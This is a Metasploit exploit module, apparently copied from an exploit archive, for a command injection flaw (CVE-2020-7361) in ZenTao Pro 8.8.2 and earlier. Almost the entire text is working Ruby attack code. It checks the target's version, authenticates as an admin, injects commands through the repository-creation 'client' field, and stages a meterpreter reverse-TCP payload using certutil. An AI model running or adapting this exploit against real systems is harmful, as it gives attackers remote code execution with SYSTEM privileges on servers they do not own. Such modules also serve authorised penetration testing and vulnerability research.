## https://sploitus.com/exploit?id=1337DAY-ID-34720
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ZenTao Pro 8.8.2 Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in ZenTao Pro
8.8.2 and earlier versions in order to execute arbitrary commands with
SYSTEM privileges.
The module first attempts to authenticate to the ZenTao dashboard. It
then tries to execute the payload by submitting fake repositories via
the 'Repo Create' function that is accessible from the dashboard via
CI>Repo. More precisely, the module sends HTTP POST requests to
'/pro/repo-create.html' that inject commands in the vulnerable 'path'
parameter which corresponds to the 'Client Path' input field.
Valid credentials for a ZenTao admin account are required. This module
has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on
Windows 10 (XAMPP server).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Monzón', # Discovery
'Melvin Boers', # PoC
'Erik Wynter' # @wyntererik - Metasploit
],
'References' =>
[
['EDB', '48633'], # PoC
['CVE', '2020-7361']
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows (x86)', {
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => :certutil,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
}
}
],
[
'Windows (x64)', {
'Arch' => [ARCH_X64],
'CmdStagerFlavor' => :certutil,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 2020'
)
)
register_options [
OptString.new('TARGETURI', [true, 'The base path to ZenTao', '/pro/']),
OptString.new('TARGETPATH', [true, 'The path on the target where commands will be executed', 'C:\\Windows\\Temp']),
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
]
end
def check
vprint_status('Running check')
# visit login the page to get the necessary cookies
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'user-login.html')
unless res
return CheckCode::Unknown('Connection failed')
end
cookie = res.get_cookies
if cookie.blank?
return CheckCode::Unknown('Unable to retrieve HTTP cookie header')
end
# check if the language is set to English, otherwise change it to English
unless cookie.scan(/lang=(.*?);/).flatten.first == 'en-US'
cookie.gsub!(/lang=(.*?);/, 'lang=en;')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'score-ajax-selectLang.html'),
'cookie' => cookie
})
unless res
return CheckCode::Unknown('Connection failed')
end
@cookie = res.get_cookies
if @cookie.blank?
return CheckCode::Unknown('Unable to change the application language to English. Target may not be a ZenTao application')
end
end
# visit login page to check ZenTao version
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user-login.html'),
'cookie' => @cookie
})
unless res
return CheckCode::Unknown('Connection failed')
end
unless res.code == 200 && res.body.include?('Login - ZenTao')
return CheckCode::Safe('Target is not a ZenTao application.')
end
# obtain cookie and random value necessary to autenticate later
@cookie = res.get_cookies
retrieve_rand_val(res)
if @cookie.blank? || @random_value.blank?
return CheckCode::Unknown('Unable to obtain the tokens required for authentication')
end
# obtain version
version = res.body.scan(/v=pro(.*?)'/).flatten.first
if version.blank?
return CheckCode::Detected('Unable to obtain ZenTao version.')
end
@version = Gem::Version.new(version)
unless @version <= Gem::Version.new('8.8.2')
return CheckCode::Detected("Target is ZenTao version #{@version}.")
end
return CheckCode::Appears("Target is ZenTao version #{@version}.")
end
def retrieve_rand_val(res)
html = res.get_html_document
@random_value = html.at('input[@name="verifyRand"]')['value']
fail_with(Failure::NotFound, 'Failed to retrieve token') unless @random_value
end
def login
login_uri = normalize_uri(target_uri.path, 'user-login.html')
unless @random_value
res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
fail_with(Failure::UnexpectedReply, 'Unable to reach login page') unless res
@cookie = res.get_cookies
retrieve_rand_val(res)
end
# generate md5 hashes required for authentication
hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)
final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")
res = send_request_cgi({
'method' => 'POST',
'uri' => login_uri,
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => @cookie,
'headers' => {
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",
'X-Requested-With' => 'XMLHttpRequest',
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
},
'vars_post' => {
'account' => datastore['USERNAME'],
'password' => final_hash,
'passwordStrength' => '1',
'referer' => '/pro/',
'verifyRand' => @random_value,
'KeepLogin' => '0'
}
})
unless res
fail_with(Failure::Disconnected, 'Connection failed')
end
unless res.code == 200 && res.body.include?('success')
fail_with(Failure::NoAccess, 'Failed to authenticate. Please check if you have set the correct username and password.')
end
# visit /pro/, which is required to get to the dashboard at /pro/my/
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'cookie' => @cookie,
'headers' => {
'Upgrade-Insecure-Requests' => '1',
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",
}
})
unless res && res.code == 302
fail_with(Failure::NoAccess, 'Failed to authenticate.')
end
# finally visit /pro/my/ and check if we have been authenticated
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'my'),
'cookie' => @cookie
})
unless res && res.code == 200 && res.body.include?('Dashboard - ZenTao')
fail_with(Failure::NoAccess, 'Failed to authenticate.')
end
print_good("Successfully authenticated to ZenTao #{@version}.")
end
def execute_command(cmd, _opts = {})
cmd << ' &&' # this is necessary for compatibility with x86 targets (for x64 the module also works without this)
repo_uri = normalize_uri(target_uri.path, 'repo-create')
send_request_cgi({
'method' => 'POST',
'uri' => repo_uri,
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => @cookie,
'headers' => {
'Accept' => 'application/json, text/javascript, */*; q=0.01',
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{repo_uri}",
'X-Requested-With' => 'XMLHttpRequest',
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
},
'vars_post' => {
'SCM' => 'Git',
'name' => Rex::Text.rand_text_alpha_lower(6..10),
'path' => datastore['TARGETPATH'],
'encoding' => 'utf-8',
'client' => cmd
}
}, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
end
def exploit
login
print_status('Executing the payload...')
execute_cmdstager(background: true)
end
end